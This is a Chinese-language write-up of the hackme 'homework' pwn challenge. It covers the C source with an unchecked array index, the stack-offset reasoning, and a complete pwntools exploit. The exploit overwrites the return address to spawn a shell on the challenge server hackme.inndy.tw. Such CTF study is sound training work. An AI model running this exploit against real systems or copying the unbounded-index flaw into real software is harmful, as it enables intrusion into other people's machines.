hackme-pwn

hack me 的 pwn 系列 鬼知道 我什么时候有时间刷

pwn them all!

homework

源码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Global 1024-byte buffer: filled by ask_name(), printed by say_goodbye().
 * Being a global it is not part of run_program()'s stack frame. */
char name[1024];

/*
 * Win function of the challenge. Nothing in the program calls it; the
 * exploit redirects control flow here to get a shell.
 */
void call_me_maybe(void)
{
    static const char *const shell = "/bin/sh";

    system(shell);
}

/*
 * Turn off stdio buffering on stdin and stdout so every prompt is
 * written (and every byte read) immediately -- needed when the program
 * talks to a client over a socket instead of a terminal.
 */
void unbuffer_io(void)
{
    FILE *const streams[] = { stdin, stdout };
    size_t k;

    for (k = 0; k < sizeof streams / sizeof streams[0]; k++)
        setvbuf(streams[k], NULL, _IONBF, 0);
}

/*
 * Arm a 120-second SIGALRM. Nothing in this listing installs a handler,
 * so the default action (process termination) disconnects idle clients.
 */
void set_timeout(void)
{
    const unsigned int seconds = 120;

    alarm(seconds);
}

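/*
 * Prompt for the user's name and store it in the global `name`.
 *
 * The challenge source used gets(name), which has no length bound and
 * overflows the 1024-byte buffer into whatever follows it (this is not
 * the bug the writeup's exploit uses, but it is a real one). fgets() is
 * bounded; the trailing newline is stripped so that, for input that fits,
 * `name` ends up with the same value gets() would have produced.
 * On EOF/error `name` is left as an empty string.
 */
void ask_name(void)
{
    printf("What's your name? ");
    if (fgets(name, sizeof name, stdin) == NULL) {
        name[0] = '\0';
        return;
    }
    name[strcspn(name, "\n")] = '\0';
}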

/* Print the farewell line with whatever ask_name() stored in `name`. */
void say_goodbye(void)
{
    fputs("Goodbye, ", stdout);
    puts(name);
}

/*
 * Interactive menu over a 10-slot int array that lives in this function's
 * stack frame.
 *
 * Security note (the bug this challenge is about): the index `i` read in
 * cases 1 and 2 is a signed int that is never range-checked, so arr[i]
 * can write (case 1) or read (case 2) any int-aligned slot below or above
 * the array -- including the saved frame pointer and the saved return
 * address of run_program. Cases 3 and 4 stay within 0..9. Choosing exit
 * (case 0) returns, which is the moment an overwritten return address
 * takes effect. Per the writeup, in the published 32-bit build arr sits
 * at ebp-0x34, so slot 14 ((0x34 + 4) / sizeof(int)) overlaps the saved
 * return address; that index is a property of that build's frame layout,
 * not of this source as such.
 */
void run_program()
{
/* `i` doubles as loop counter and as the user-supplied index. */
int arr[10], i, v, act;

for(i = 0; i < 10; i++)
arr[i] = 0;

while(1) {
puts("0 > exit");
puts("1 > edit number");
puts("2 > show number");
puts("3 > sum");
puts("4 > dump all numbers");
printf(" > ");
/* Return value unchecked: on a parse failure `act` keeps its previous
 * (initially indeterminate) value and the menu is simply printed again. */
scanf("%d", &act);

switch(act) {
case 0:
return;
case 1:
printf("Index to edit: ");
scanf("%d", &i);
printf("How many? ");
scanf("%d", &v);
/* Unbounded, signed index: arbitrary 4-byte write relative to arr. */
arr[i] = v;
break;
case 2:
printf("Index to show: ");
scanf("%d", &i);
/* Same missing bound on the read side: leaks any stack slot as an int. */
printf("arr[%d] is %d\n", i, arr[i]);
break;
case 3:
v = 0;
for(i = 0; i < 10; i++)
v += arr[i];
printf("Sum is %d\n", v);
break;
case 4:
for(i = 0; i < 10; i++)
printf("arr[%d] is %d\n", i, arr[i]);
break;
}
}
}

/*
 * Entry point: arm the idle timeout, make stdio unbuffered, read the
 * name, run the menu loop, then print the farewell.
 */
int main(void)
{
    set_timeout();
    unbuffer_io();
    ask_name();
    run_program();
    say_goodbye();
    return EXIT_SUCCESS;
}

看看怎么利用

image-20220602163909356

数组越界写：edit 时输入的索引 i 没有任何范围检查（而且是有符号 int），所以 arr[i] = v 可以写到 arr 之外、run_program 栈帧里的任意 4 字节位置，包括保存的返回地址

从栈帧布局很容易算出来：arr 位于 ebp-0x34，而 run_program 保存的返回地址位于 ebp+4，两者相距 0x34+4 = 0x38 = 56 字节

56 = 4 * 14（每个 int 占 4 字节），可知 arr[14] 正好就是返回地址；把它改成 call_me_maybe 的地址（exp 里的 ret_addr）即可。注意这个偏移取决于题目给的二进制的栈帧布局，换了编译产物要重新算

然后我们直接打就行了

exp

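#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Exploit for hackme "homework": out-of-bounds write through an unchecked index.

run_program() lets us store a 4-byte int at arr[i] with no range check on i.
In the published 32-bit binary arr lives at ebp-0x34, so slot 14
((0x34 + 4) // 4) overlaps run_program's saved return address.  Overwriting
it with the address of call_me_maybe() and then choosing "0 > exit" makes
the function return into system("/bin/sh").
"""
from pwn import *

context(log_level="debug", arch="i386", os="linux")

# Address of call_me_maybe in the remote binary (taken from the writeup).
# Re-check with `objdump -d` / `nm` if the binary is rebuilt.
RET_ADDR = 0x80485FB

# Array slot that overlaps the saved return address: (0x34 + 4) // sizeof(int).
RET_INDEX = 14

HOST, PORT = "hackme.inndy.tw", 7701


def as_scanf_int(value):
    """Return *value* as the decimal bytes scanf("%d") will parse into an int.

    The target stores the number with %d into a 32-bit int, so an address
    >= 0x80000000 has to be sent in its negative two's-complement form.
    """
    value &= 0xFFFFFFFF
    if value >= 0x80000000:
        value -= 0x100000000
    return str(value).encode()


def exploit(p):
    """Drive the menu over tube *p*: plant the return address, then exit."""
    p.sendlineafter(b"name?", b"b1")
    p.sendlineafter(b" > ", b"1")  # 1 > edit number
    p.sendlineafter(b"Index to edit: ", str(RET_INDEX).encode())
    p.sendlineafter(b"How many? ", as_scanf_int(RET_ADDR))
    # run_program only returns -- and the overwritten saved return address
    # only takes effect -- once we pick "0 > exit".
    p.sendlineafter(b" > ", b"0")


if __name__ == "__main__":
    p = remote(HOST, PORT)
    exploit(p)
    p.interactive()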

最后还要再输入 0（exit）让 run_program 返回：只有函数返回时，被覆盖的返回地址才会生效，程序才会跳到 call_me_maybe 执行 system("/bin/sh")，拿到 shell

一些pwntools中的常用命令

  • send(payload) 发送payload
  • sendline(payload) 发送 payload，并在末尾追加换行符 \n
  • sendafter(some_string, payload) 接收到 some_string 后，再发送你的 payload；sendlineafter 同理，只是会在末尾追加 \n（上面 exp 用的就是它）
  • recvn(N) 接收 N（数字）个字符
  • recvline() 接收一行输出
  • recvlines(N) 接收 N(数字) 行输出
  • recvuntil(some_string) 接收到 some_string 为止